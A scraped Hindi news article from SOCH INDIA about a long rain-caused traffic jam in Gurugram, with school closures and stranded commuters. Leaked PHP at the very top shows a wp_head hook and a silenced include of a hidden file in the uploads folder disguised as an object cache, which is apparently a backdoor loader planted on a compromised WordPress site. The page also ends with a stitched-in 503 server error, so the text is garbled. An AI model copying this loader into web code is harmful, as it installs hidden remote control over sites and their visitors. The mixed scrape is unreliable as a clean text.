add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); गुरुग्राम में कल शाम से लगा भारी जाम, भूख-प्यास से लोग परेशान, स्कूलों की छुट्टी – SOCH INDIA
Menu

दुनिया
गुरुग्राम में कल शाम से लगा भारी जाम, भूख-प्यास से लोग परेशान, स्कूलों की छुट्टी

nobanner

गुरुग्राम में कल शाम से लगा भारी जाम, भूख-प्यास से लोग परेशान, स्कूलों की छुट्टी

गुरुग्राम। राष्ट्रीय राजधानी दिल्ली से सटे गुरुग्राम में भारी बारिश की वजह से कई किलोमीटर लंबा भारी जाम लग गया है। जाम खुलने के आसार ना होने की वजह से क्षेत्र की स्कूलों की छुट्टी कर दी गई है। दिल्ली-जयपुर हाईवे पर लगे जाम की वजह से दफ्तर आने जाने वालों को भारी परेशानी का सामना करना पड़ रहा है। साथ ही जो लोग जाम में फंसे हुए हैं वो भूख-प्यास से परेशान है।

वहीं प्रशासन ने जाम को लेकर आपात बैठक बुलाई है। गुरुग्राम के डिप्टी कमिश्नर ने आईबीएन7 से बात करते हुए कहा कि गुरुग्राम के कई इलाके जाम से बुरी तरह प्रभावित हैं। उन्होंने कहा कि प्रशासन जल्द से जल्द जाम खत्म करने की कोशिश में लगा हुआ है। वहीं सड़कों पर ट्रैफिक पुलिस को कड़ी मशक्कत करनी पड़ रही है।

×

हालांकि कल शाम 6 बजे से लगा जाम अभी जल्द खुलने की उम्मीद नजर नहीं आ रही है। लोगों की माने तो जाम खुलने में अभी भी कई और घंटे लग सकते हैं। फिलहाल जाम में सैकड़ों लोग 12 घंटों से सड़कों पर फंसे हुए हैं। जाम को ज्यादा समय होने की वजह से कई गाड़ियों का पेट्रोल-डीजल भी खत्म हो गया है, जिसकी वजह से दिक्कतें बढ़ गई है।

रात में एक बार खबर आई कि जाम खुलने लगा है जिससे लोगों ने राहत की सांस ली। लेकिन सुबह होते ही ट्रैफिक शुरू हुआ तो जाम फिर से बढ़ने लगा। दरअसल कल शाम से ही हो रही बारिश ने सड़कों पर ब्रेक लगा दिया। शाम को गुरुग्राम से दिल्ली लौटने वाली गाड़ियों की संख्या ज्यादा होने के चलते धीरे धीरे जाम लगने लगा और फिर ये महाजाम में बदल गया।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.